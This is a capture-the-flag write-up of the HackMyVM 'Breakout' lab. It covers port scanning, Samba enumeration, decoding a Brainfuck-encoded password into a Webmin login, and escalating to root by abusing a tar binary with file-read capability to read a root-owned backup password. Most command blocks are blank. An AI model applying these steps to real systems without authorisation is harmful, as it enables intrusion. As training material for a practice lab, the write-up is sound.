Breakout Write-Up

Introduction

In this write-up, I will guide you through the steps I took to complete the HackMyVM - Breakout CTF challenge. The objective is to gain root access to the target machine by exploiting identified vulnerabilities. Checkout the video here.

TL;DR

• Run Nmap.

• Visit web page, check source code.

• Identify encoding format, decode.

• Visit web page, login using decoded password.

• Get user flag.

• Run linPEAS, find password file.

• Run executable to compress password.

• Decompress, read password.

• Visit web page, login using decompressed password.

• Get root flag.

Reconnaissance

Network/Port Scanning (Nmap)

Command:

Explanation:

• nmap: Tool used to scan network and ports to discover which services are running.

• -sV: Perform version detection of services.

• -sC: Scan using default scripts.

• -oA: Output in filename "breakout".

• 172.16.101.74: IP address of Breakout VM on my network.

Output:

Findings: We see that there is a web server running on port 80, a Samba server and some other HTTP servers on port 10000 and 20000.

Let's check out the web server and in the background we can run gobuster and enum4linux to brute force web directories and any information about the Samba server respectively.

Directory Brute-forcing (Gobuster)

Command:

Note: I have setup an alias to run gobuster inside a docker container.

Alias: alias gobuster='docker run -it --rm --name gobuster -v /home/ayush/Tools/SecLists/:/SecLists ghcr.io/oj/gobuster'

Explanation:

• dir: Mode of operation indicating directory/file enumeration.

• -u http://172.16.101.74: Base URL of the target web server to scan.

• -w /SecLists/Discovery/Web-Content/directory-list-2.3-big.txt: Path of word list to use.

Output:

Findings:

Nothing interesting was found.

Enumerating Samba Server (enum4linux)

Command:

Explanation:

• -a: Do all simple enumeration (-U -S -G -P -r -o -n -i).

• 172.16.101.74 : IP of the target samba server to enumerate.

Output:

Findings:

A user cyber was found.

Visiting Web Page (Port 80)

This is a normal Apache landing page. Let's check the source code in case there is some extra information there. Open the page source code using the shortcut Ctrl + U.

Here we find a comment at the bottom:

This looks like an encoded message. We can use dcode.fr to figure out which encoding this is and then try to decode it.

On analysing the encoding, the website suggests that the Brainf*ck encoding is used.

We can decode the Brainfu*ked message using Brainf*ck Decoder and we get the following output:

This looks like a password, we can try it out somewhere.

Visiting Web Page (Port 20000)

On visiting http://172.16.101.74:20000 the web page asks us to redirect to https://172.16.101.74:20000 (HTTPS).

Click on the link to visit the HTTPS web page.

We get a Webmin page with an authentication page.

User (cyber) Access

We can try the cyber username we found from the Samba enumeration and .2uqPEfj3D<P'a-3 password from decoding the encoded message.

The credentials work and we get a menu to the left.

On the bottom of the menu, there is an icon which will give you a shell access.

We can read the user flag from the user.txt file by running the command:

Privilege Escalation

Listing the files and the permissions in the current directory (/home/cyber) shows that there is an executable tar which is owned by root and also has the permission to be executed as root.

On digging deeper, we can see that the tar executable is allowed to read all the files in the file system.

ChatGPT explanation:

After looking through the file system of the victim machine, we will find a hidden file at /var/backups/.old_pass.bak

The permissions show that the file is owned by the root user and only the root user has read and write permissions.

We can use the tar executable from the home directory to read the contents of the file, by compressing the .old_pass.bak file and then decompressing it again.

We start with compressing the file. Command:

Then we decompress it.

Command:

Let's check the permissions on the decompressed file. Command:

We see that the decompressed file is owned by the user cyber and the owner is allowed to read and write to the file.

Reading the decompressed file: Command:

Looks like a password, we can try it with the root user.

Try using the username root and password Ts&4&YurgtRX(=~h on the Webmin authentication portal at https://172.16.101.74:20000/

We get access to the root from these credentials.

And finally, we can read the root flag: